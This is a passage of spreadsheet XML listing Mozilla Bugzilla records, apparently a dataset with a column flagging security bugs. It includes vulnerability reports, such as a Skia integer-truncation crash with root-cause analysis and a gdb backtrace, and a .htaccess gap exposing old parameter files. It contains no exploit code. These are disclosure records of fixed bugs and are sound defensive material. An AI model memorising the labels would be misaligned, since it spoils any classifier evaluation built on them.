          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1770" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1770" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1770" t="inlineStr">
        <is>
          <t>[adv-main61+][adv-esr60.1+]</t>
        </is>
      </c>
      <c r="Q1770" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1770" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1770" t="inlineStr">
        <is>
          <t>mozilla62</t>
        </is>
      </c>
      <c r="T1770" t="n">
        <v>1</v>
      </c>
      <c r="U1770" t="n">
        <v>0</v>
      </c>
      <c r="V1770" t="n">
        <v>12</v>
      </c>
      <c r="W1770" t="inlineStr">
        <is>
          <t>Created attachment 8982105
poc16G.html
User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Build ID: 20180517113820
Steps to reproduce:
This is a variant of vulnerability hrer:https://bugzilla.mozilla.org/show_bug.cgi?id=1418447
System: Ubuntu 16.04.4 LTS (64bit)
Firefox version: 60.0.1 (64-bit)
RAM size:16G
SWAP size:5.9G
Root cause:
https://searchfox.org/mozilla-central/source/gfx/skia/skia/src/core/SkEdgeBuilder.cpp#255
   SkPath::Iter    iter(path, true);
    SkPoint         pts[4];
    SkPath::Verb    verb;
    size_t maxEdgeCount = path.countPoints();
    if (iclip) {
        // clipping can turn 1 line into (up to) kMaxClippedLineSegments, since
        // we turn portions that are clipped out on the left/right into vertical
        // segments.
        maxEdgeCount *= SkLineClipper::kMaxClippedLineSegments;
    }
    size_t edgeSize;
    char* edge;
    switch (fEdgeType) {
        case kEdge:
            edgeSize = sizeof(SkEdge);
            edge = (char*)fAlloc.makeArrayDefault&lt;SkEdge&gt;(maxEdgeCount);
            break;
        case kAnalyticEdge:
            edgeSize = sizeof(SkAnalyticEdge);
            edge = (char*)fAlloc.makeArrayDefault&lt;SkAnalyticEdge&gt;(maxEdgeCount);
            break;
        case kBezier:
            edgeSize = sizeof(SkLine);
            edge = (char*)fAlloc.makeArrayDefault&lt;SkLine&gt;(maxEdgeCount);
            break;
    }
....................................
T* makeArrayDefault(size_t count) {
        uint32_t safeCount = SkTo&lt;uint32_t&gt;(count); 
"SkTo&lt;uint32_t&gt;(count)" just convert "maxEdgeCount" to a uint32_t type variable.
So if "maxEdgeCount" is larger than 0x100000000(4G),.......
Steps to reproduce:
To trigger the vulnerability, we need about 16G memory.
Open attached html file(with attached gdb) and clicker "trigger",  ff will crash in less than 10 minutes.(My computer is pretty old, with better CPU and larger memory, ff should crash more quickly)
(gdb) sharedlibrary libxul
Reading symbols from /usr/lib/firefox/libxul.so...Reading symbols from /usr/lib/debug/.build-id/8d/03b3c494a48356d5df2ea89f4fcbfa565904c4.debug...done.
done.
(gdb) bt 8
#0  SkEdgeBuilder::CombineVertical (this=0x7ffce76b9750, edge=0x7f08dae5f018, last=0x1680000)
    at /build/firefox-AIw0T6/firefox-60.0.1+build2/gfx/skia/skia/src/core/SkEdgeBuilder.cpp:22
#1  0x00007f08e774ffe8 in SkEdgeBuilder::addPolyLine (shiftUp=23592960, edgePtr=@0x7ffce76b91c8: 0x7f08dae5f030, 
    edgeSize=40, edge=@0x7ffce76b91c0: 0x7f08dae5f018 "8\\\334\332\b\177", pts=0x7ffce76b9240, this=0x7ffce76b9750)
    at /build/firefox-AIw0T6/firefox-60.0.1+build2/gfx/skia/skia/src/core/SkEdgeBuilder.h:110
#2  SkEdgeBuilder::buildPoly (this=this@entry=0x7ffce76b9750, path=..., iclip=iclip@entry=0x7ffce76b96b0, 
    shiftUp=shiftUp@entry=2, canCullToTheRight=canCullToTheRight@entry=true)
    at /build/firefox-AIw0T6/firefox-60.0.1+build2/gfx/skia/skia/src/core/SkEdgeBuilder.cpp:306
#3  0x00007f08e7755b57 in SkEdgeBuilder::build (this=this@entry=0x7ffce76b9750, path=..., iclip=0x7ffce76b96b0, 
    shiftUp=2, canCullToTheRight=&lt;optimized out&gt;, edgeType=SkEdgeBuilder::kEdge)
    at /build/firefox-AIw0T6/firefox-60.0.1+build2/gfx/skia/skia/src/core/SkEdgeBuilder.cpp:354
#4  0x00007f08e7755d7b in SkEdgeBuilder::build_edges (this=this@entry=0x7ffce76b9750, path=..., 
    shiftedClip=shiftedClip@entry=0x7ffce76b96b0, shiftEdgesUp=shiftEdgesUp@entry=2, 
    pathContainedInClip=pathContainedInClip@entry=false, edgeType=edgeType@entry=SkEdgeBuilder::kEdge)
    at /build/firefox-AIw0T6/firefox-60.0.1+build2/gfx/skia/skia/src/core/SkEdgeBuilder.cpp:457
#5  0x00007f08e77ab814 in sk_fill_path (path=..., clipRect=..., blitter=blitter@entry=0x7ffce76b9a10, start_y=-150, 
    stop_y=150, shiftEdgesUp=shiftEdgesUp@entry=2, pathContainedInClip=false)
    at /build/firefox-AIw0T6/firefox-60.0.1+build2/gfx/skia/skia/src/core/SkScan_Path.cpp:406
#6  0x00007f08e74f46d6 in SkScan::SAAFillPath (path=..., blitter=blitter@entry=0x7ffce76ba618, ir=..., 
    clipBounds=..., forceRLE=forceRLE@entry=false)
    at /build/firefox-AIw0T6/firefox-60.0.1+build2/gfx/skia/skia/src/core/SkScan_AntiPath.cpp:629
#7  0x00007f08e74f4d12 in SkScan::AntiFillPath (path=..., origClip=..., blitter=&lt;optimized out&gt;, 
    blitter@entry=0x7ffce76ba618, forceRLE=forceRLE@entry=false, daaRecord=daaRecord@entry=0x0)
    at /build/firefox-AIw0T6/firefox-60.0.1+build2/gfx/skia/skia/src/core/SkScan_AntiPath.cpp:747
(More stack frames follow...)</t>
        </is>
      </c>
      <c r="X1770" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1771">
      <c r="A1771" t="n">
        <v>434801</v>
      </c>
      <c r="B1771" t="inlineStr">
        <is>
          <t>2008-05-20 10:35:31 -0700</t>
        </is>
      </c>
      <c r="C1771" t="inlineStr">
        <is>
          <t>[SECURITY] .htaccess doesn't prevent reading old-params.txt from the web</t>
        </is>
      </c>
      <c r="D1771" t="inlineStr">
        <is>
          <t>2010-01-31 19:07:54 -0800</t>
        </is>
      </c>
      <c r="E1771" t="n">
        <v>1</v>
      </c>
      <c r="F1771" t="n">
        <v>1</v>
      </c>
      <c r="G1771" t="n">
        <v>4</v>
      </c>
      <c r="H1771" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1771" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1771" t="inlineStr">
        <is>
          <t>Installation &amp; Upgrading</t>
        </is>
      </c>
      <c r="K1771" t="inlineStr">
        <is>
          <t>3.1.4</t>
        </is>
      </c>
      <c r="L1771" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1771" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1771" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1771" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1771" t="inlineStr"/>
      <c r="Q1771" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1771" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1771" t="inlineStr">
        <is>
          <t>Bugzilla 3.4</t>
        </is>
      </c>
      <c r="T1771" t="n">
        <v>1</v>
      </c>
      <c r="U1771" t="n">
        <v>0</v>
      </c>
      <c r="V1771" t="n">
        <v>20</v>
      </c>
      <c r="W1771" t="inlineStr">
        <is>
          <t>When a parameter becomes obsolete, checksetup.pl automatically moves it into old-params.txt. If you have an old enough installation, or if you have customized your installation with your own parameters and some of these parameters are no longer in use, they will become publicly accessible from the web as .htaccess doesn't protect old-params.txt. This may be a problem if some parameters contain sensitive data (such as passwords), e.g. smtp_password and smtp_username (assuming they become obsolete one day).
.htaccess needs to be updated to protect old-params.txt.</t>
        </is>
      </c>
      <c r="X1771" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1772">
      <c r="A1772" t="n">
        <v>615147</v>
      </c>
      <c r="B1772" t="inlineStr">
        <is>
          <t>2010-11-28 18:31:01 -0800</t>
        </is>
      </c>
      <c r="C1772" t="inlineStr">
        <is>
          <t>Integer overflow leads to incorrect buffer size in nsTSubstring_CharT::MutatePrep</t>
        </is>
      </c>
      <c r="D1772" t="inlineStr">
        <is>
          <t>2020-12-09 12:56:52 -0800</t>
        </is>
      </c>
      <c r="E1772" t="n">
        <v>1</v>
      </c>
      <c r="F1772" t="n">
        <v>1</v>
      </c>
      <c r="G1772" t="n">
        <v>3</v>
      </c>
      <c r="H1772" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1772" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1772" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K1772" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1772" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1772" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1772" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1772" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1772" t="inlineStr">
        <is>
          <t>[sg:critical?][hardblocker] [qa-examined-192]</t>
        </is>
      </c>
      <c r="Q1772" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1772" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1772" t="inlineStr">
        <is>
          <t>mozilla2.0b10</t>
        </is>
      </c>
      <c r="T1772" t="n">
        <v>1</v>
      </c>
      <c r="U1772" t="n">
        <v>0</v>
      </c>
      <c r="V1772" t="n">
        <v>20</v>
      </c>
      <c r="W1772" t="inlineStr">
        <is>
          <t>As neil@parkwaycc.co.uk noted in bug 615112 comment 5:
&gt;If the above is a problem then this line from MutatePrep is too:
&gt;size_type storageSize = (capacity + 1) * sizeof(char_type);
This is indeed a bug...</t>
        </is>
      </c>
      <c r="X1772" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1773">
      <c r="A1773" t="n">
        <v>91726</v>
      </c>
      <c r="B1773" t="inlineStr">
        <is>
          <t>2001-07-20 22:25:58 -0700</t>
        </is>
      </c>
      <c r="C1773" t="inlineStr">
        <is>
          <t>Crash clicking on .exe file from web page</t>
        </is>
      </c>
      <c r="D1773" t="inlineStr">
        <is>
          <t>2004-11-23 18:54:58 -0800</t>
        </is>
      </c>
      <c r="E1773" t="n">
        <v>1</v>
      </c>
      <c r="F1773" t="n">
        <v>1</v>
      </c>
      <c r="G1773" t="n">
        <v>2</v>
      </c>
      <c r="H1773" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1773" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J1773" t="inlineStr">
        <is>
          <t>UI Design</t>
        </is>
      </c>
      <c r="K1773" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1773" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M1773" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1773" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1773" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1773" t="inlineStr">
        <is>
          <t>OSX+</t>
        </is>
      </c>
      <c r="Q1773" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1773" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1773" t="inlineStr">
        <is>
          <t>mozilla0.9.4</t>
        </is>
      </c>
      <c r="T1773" t="n">
        <v>1</v>
      </c>
      <c r="U1773" t="n">
        <v>0</v>
      </c>
      <c r="V1773" t="n">
        <v>31</v>
      </c>
      <c r="W1773" t="inlineStr">
        <is>
          <t>Crash clicking on .exe file from web page
I'm testing this on a Mac OS X 2001-07-17 branch build.  I searched bugzilla for
platform Mac builds with crash keyword and didn't see this filed.  I haven't had
a chance to check to see if this problem occurs outside of OS X.
1.  Start the product
2.  Go to any page which has an .exe.  I used:
http://home.netscape.com/browsers/6/index61pr.html?cp=dowwin#Preview Release
3.  Go to the bottom of the page and click on the link for "English" under Windows.
4.  Crash occurs.
I don't have Talkback enabled on this OS X build of the product.  I don't have
MacsBug set up (sorry).
I know that I'm clicking on an .exe file for Windows, but a crash shouldn't happen.</t>
        </is>
      </c>
      <c r="X1773" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1774">
      <c r="A1774" t="n">
        <v>7427</v>
      </c>
      <c r="B1774" t="inlineStr">
        <is>
          <t>1999-06-01 14:45:12 -0700</t>
        </is>
      </c>
      <c r="C1774" t="inlineStr">
        <is>
          <t>[QA blocker]: Japanese page/mail displays as blank squares</t>
        </is>
      </c>
      <c r="D1774" t="inlineStr">
        <is>
          <t>2005-03-17 13:34:04 -0800</t>
        </is>
      </c>
      <c r="E1774" t="n">
        <v>1</v>
      </c>
      <c r="F1774" t="n">
        <v>1</v>
      </c>
      <c r="G1774" t="n">
        <v>3</v>
      </c>
      <c r="H1774" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1774" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1774" t="inlineStr">
        <is>
          <t>Internationalization</t>
        </is>
      </c>
      <c r="K1774" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1774" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1774" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N1774" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1774" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1774" t="inlineStr"/>
      <c r="Q1774" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1774" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1774" t="inlineStr">
        <is>
          <t>M7</t>
        </is>
      </c>
      <c r="T1774" t="n">
        <v>1</v>
      </c>
      <c r="U1774" t="n">
        <v>0</v>
      </c>
      <c r="V1774" t="n">
        <v>11</v>
      </c>
      <c r="W1774" t="inlineStr">
        <is>
          <t>** Observed with 6/1/99 Win32 build **
** This is observed only under Japanese Windows NT4 so far **
** These are not problems under US Windows NT **
I first noticed this problem with the Smoke tests for Intl Mail. There both
Japanese and UTF-8 messages showed as only as blank squares in thread pane,
message header and body. The UTF-8 message we use contains Japanese
characters.
When I checked Japanese web pages, I found that thereif the charset
selection and the web doc charset match, only square blanks were
displayed. For example, trying visiting the above page with the
encoding set to Shift_JIS -- you'll see squares.
Additional notes:
1. Korean page seems to be fine.
2. UTF-8 page seems to display OK.
For Mail messages:
1. Japanese message headers and body display squares
2. UTF-8 JPN header and body display as squares.</t>
        </is>
      </c>
      <c r="X1774" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1775">
      <c r="A1775" t="n">
        <v>626631</v>
      </c>
      <c r="B1775" t="inlineStr">
        <is>
          <t>2011-01-18 06:46:02 -0800</t>
        </is>
      </c>
      <c r="C1775" t="inlineStr">
        <is>
          <t>WebWorker causes firefox to crash [@ js::PropertyTable::search(int, bool) ]</t>
        </is>
      </c>
      <c r="D1775" t="inlineStr">
        <is>
          <t>2024-05-29 15:48:24 -0700</t>
        </is>
      </c>
      <c r="E1775" t="n">
        <v>1</v>
      </c>
      <c r="F1775" t="n">
        <v>1</v>
      </c>
      <c r="G1775" t="n">
        <v>3</v>
      </c>
      <c r="H1775" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1775" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1775" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1775" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1775" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1775" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1775" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1775" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1775" t="inlineStr">
        <is>
          <t>[sg:critical?][hardblocker][fixed-in-tracemonkey]</t>
        </is>
      </c>
      <c r="Q1775" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1775" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1775" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1775" t="n">
        <v>1</v>
      </c>
      <c r="U1775" t="n">
        <v>0</v>
      </c>
      <c r="V1775" t="n">
        <v>24</v>
      </c>
      <c r="W1775" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; Linux x86_64; rv:2.0b10pre) Gecko/20110116 Firefox/4.0b10pre
Build Identifier: Mozilla/5.0 (X11; Linux x86_64; rv:2.0b10pre) Gecko/20110116 Firefox/4.0b10pre
Simple WebWorker causes Firefox to crash. Run the listed page with at least one worker thread. Firefox will crash 
Reproducible: Always
Steps to Reproduce:
1. Visit Web Page 
2. Start up at least one Worker thread 
3. wait 
Actual Results:  
Firefox crashes
Expected Results:  
Backround thread run and posts data to the UI thread</t>
        </is>
      </c>
      <c r="X1775" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1776">
      <c r="A1776" t="n">
        <v>411432</v>
      </c>
      <c r="B1776" t="inlineStr">
        <is>
          <t>2008-01-08 18:31:37 -0800</t>
        </is>
      </c>
      <c r="C1776" t="inlineStr">
        <is>
          <t>getting to top crash reports is really slow</t>
        </is>
      </c>
      <c r="D1776" t="inlineStr">
        <is>
          <t>2011-12-28 10:40:11 -0800</t>
        </is>
      </c>
      <c r="E1776" t="n">
        <v>1</v>
      </c>
      <c r="F1776" t="n">
        <v>1</v>
      </c>
      <c r="G1776" t="n">
        <v>4</v>
      </c>
      <c r="H1776" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1776" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J1776" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1776" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1776" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1776" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1776" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1776" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1776" t="inlineStr"/>
      <c r="Q1776" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1776" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1776" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1776" t="n">
        <v>1</v>
      </c>
      <c r="U1776" t="n">
        <v>0</v>
      </c>
      <c r="V1776" t="n">
        <v>4</v>
      </c>
      <c r="W1776" t="inlineStr">
        <is>
          <t>Reported by chofmann, Today (4 hours ago)
What is the problem?
   go to http://crash-stats.mozilla.com/topcrasher
   click on something like the link to -&gt;  Firefox 3.0b2  
What is the expected behavior? What happens instead?
   looks like the report might be generated on the fly and its really slow to show of list of the top crashers in the recent beta.
    we should run a nightly report and then cache it so we can quickly get
at a top 20 list for analysis.
--
Comment 1 by bsmedberg, Today (4 hours ago)
It is generated on the fly. Morgamic and aravind will be taking down the database for upgrades and tuning and partitioning sometime this week. I think that we should defer this for a very long time and allow the netscaler to cache this for a longer period of time if necessary.
--
Comment 2 by chofmann, Today (4 hours ago)
"very long time" as in 24 hours would be fine.  longer makes it possible that we
could miss critical issues that arise with changes in web content that might bring on a slew of incoming crash reports, and not see a stack signature make a big move up the charts.
it'd be nice to have a set of query reports that ran nightly, and another set that could be run on the fly. there will be lots of interesting ways we want to look at the data though a variety of reports, but each way should fall into wanting to view and analyze it base on a nightly snapshot, or have access to the latest incoming reports.
--
Comment 3 by bsmedberg, Today (4 hours ago)
I meant more like 60 minutes...
If we can keep the database happy, I'd prefer to avoid nightly snapshot queries, just to avoid complexity.
I think also, to avoid missing things moving up the charts, we should create a "new big crashers" report, which is filed here as in issue 75... that patch would need to be updated to trunk.
--
Comment 4 by morgamic, Today (2 hours ago)
There is a bug on this already, it's due to the size of the initial partition in the breakpad db, which will be attended to tonight during the maintenance window.  I mentioned this in the allhands yesterday morning.</t>
        </is>
      </c>
      <c r="X1776" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1777">
      <c r="A1777" t="n">
        <v>1182779</v>
      </c>
      <c r="B1777" t="inlineStr">
        <is>
          <t>2015-07-11 06:53:14 -0700</t>
        </is>
      </c>
      <c r="C1777" t="inlineStr">
        <is>
          <t>Drop several columns from the datasource table on stage/prod/heroku</t>
        </is>
      </c>
      <c r="D1777" t="inlineStr">
        <is>
          <t>2015-07-13 09:33:19 -0700</t>
        </is>
      </c>
      <c r="E1777" t="n">
        <v>1</v>
      </c>
      <c r="F1777" t="n">
        <v>1</v>
      </c>
      <c r="G1777" t="n">
        <v>7</v>
      </c>
      <c r="H1777" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1777" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J1777" t="inlineStr">
        <is>
          <t>Treeherder: Infrastructure</t>
        </is>
      </c>
      <c r="K1777" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L1777" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1777" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1777" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1777" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1777" t="inlineStr"/>
      <c r="Q1777" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1777" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1777" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1777" t="n">
        <v>1</v>
      </c>
      <c r="U1777" t="n">
        <v>0</v>
      </c>
      <c r="V1777" t="n">
        <v>3</v>
      </c>
      <c r="W1777" t="inlineStr">
        <is>
          <t>Once bug 1182455 is deployed we need to drop several columns from the datasource table. We can't do this until that bug is deployed, but equally we must do so before the next time we add a new repo we'll get errors due to the columns not being defined in the SQL statements in-repo (since there are no defaults on those columns).
Columns to be dropped:
* host
* read_only_host
* type
* creation_date
eg 
ALTER TABLE treeherder.datasource DROP COLUMN host, read_only_host, type, creation_date;</t>
        </is>
      </c>
      <c r="X1777" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1778">
      <c r="A1778" t="n">
        <v>1124247</v>
      </c>
      <c r="B1778" t="inlineStr">
        <is>
          <t>2015-01-21 09:13:42 -0800</t>
        </is>
      </c>
      <c r="C1778" t="inlineStr">
        <is>
          <t>Create funnelcake builds for Yahoo and First Run testing</t>
        </is>
      </c>
      <c r="D1778" t="inlineStr">
        <is>
          <t>2015-01-28 10:41:55 -0800</t>
        </is>
      </c>
      <c r="E1778" t="n">
        <v>1</v>
      </c>
      <c r="F1778" t="n">
        <v>1</v>
      </c>
      <c r="G1778" t="n">
        <v>5</v>
      </c>
      <c r="H1778" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1778" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1778" t="inlineStr">
        <is>
          <t>Release Requests</t>
        </is>
      </c>
      <c r="K1778" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1778" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1778" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1778" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1778" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1778" t="inlineStr">
        <is>
          <t>[fxgrowth]</t>
        </is>
      </c>
      <c r="Q1778" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1778" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1778" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1778" t="n">
        <v>1</v>
      </c>
      <c r="U1778" t="n">
        <v>0</v>
      </c>
      <c r="V1778" t="n">
        <v>16</v>
      </c>
      <c r="W1778" t="inlineStr">
        <is>
          <t>Hi RelEng team.
We would like to create a few funnelcake builds based off of Win32 en-US Firefox 35. It will probably be 3 identical builds, but just with a different funnelcake number, but I am confirming.
The products should be created on bouncer like we have before as with the -f[funnelcake ID] in the product name. 
How much extra work is it to create related stub installer funnelcake builds? If not, I will have to distribute non-stub installs by varying the product name.</t>
        </is>
      </c>
      <c r="X1778" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1779">
      <c r="A1779" t="n">
        <v>1163359</v>
      </c>
      <c r="B1779" t="inlineStr">
        <is>
          <t>2015-05-09 18:29:54 -0700</t>
        </is>
      </c>
      <c r="C1779" t="inlineStr">
        <is>
          <t>Crash [@ moz_speex_inner_product_single ] | Assertion failure: aIndex &lt; Length() (invalid array index)</t>
        </is>
      </c>
      <c r="D1779" t="inlineStr">
        <is>
          <t>2016-07-02 10:44:40 -0700</t>
        </is>
      </c>
      <c r="E1779" t="n">
        <v>1</v>
      </c>
      <c r="F1779" t="n">
        <v>1</v>
      </c>
      <c r="G1779" t="n">
        <v>3</v>
      </c>
      <c r="H1779" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1779" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1779" t="inlineStr">
        <is>
          <t>Web Audio</t>
        </is>
      </c>
      <c r="K1779" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1779" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1779" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1779" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1779" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1779" t="inlineStr">
        <is>
          <t>[adv-main39+][adv-esr38.1+]</t>
        </is>
      </c>
      <c r="Q1779" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1779" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1779" t="inlineStr">
        <is>
          <t>mozilla41</t>
        </is>
      </c>
      <c r="T1779" t="n">
        <v>1</v>
      </c>
      <c r="U1779" t="n">
        <v>0</v>
      </c>
      <c r="V1779" t="n">
        <v>33</v>
      </c>
      <c r="W1779" t="inlineStr">
        <is>
          <t>Created attachment 8603782
Assertion crash report
1. http://buu.yle.fi/jul14/14/
2. Crash [@ moz_speex_inner_product_single ]
   bp-5832804a-18c1-454e-ada3-6951e2150510
rated as low exploitability -&gt; s-s
or in debug
Assertion failure: aIndex &lt; Length() (invalid array index), at ../../../dist/include/nsTArray.h:970
Lots of intermittent unittests with this assertion.
Appears to be all branches/OS.</t>
        </is>
      </c>
      <c r="X1779" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1780">
      <c r="A1780" t="n">
        <v>1005991</v>
      </c>
      <c r="B1780" t="inlineStr">
        <is>
          <t>2014-05-05 09:53:39 -0700</t>
        </is>
      </c>
      <c r="C1780" t="inlineStr">
        <is>
          <t>crash in NS_CycleCollectorSuspect3 under mozilla::storage::Statement::internalFinalize(bool)</t>
        </is>
      </c>
      <c r="D1780" t="inlineStr">
        <is>
          <t>2024-08-20 12:28:43 -0700</t>
        </is>
      </c>
      <c r="E1780" t="n">
        <v>1</v>
      </c>
      <c r="F1780" t="n">
        <v>1</v>
      </c>
      <c r="G1780" t="n">
        <v>3</v>
      </c>
      <c r="H1780" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1780" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1780" t="inlineStr">
        <is>
          <t>SQLite and Embedded Database Bindings</t>
        </is>
      </c>
      <c r="K1780" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1780" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1780" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1780" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1780" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1780" t="inlineStr">
        <is>
          <t>[adv-main37+][b2g-adv-main2.2+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q1780" t="inlineStr">
        <is>
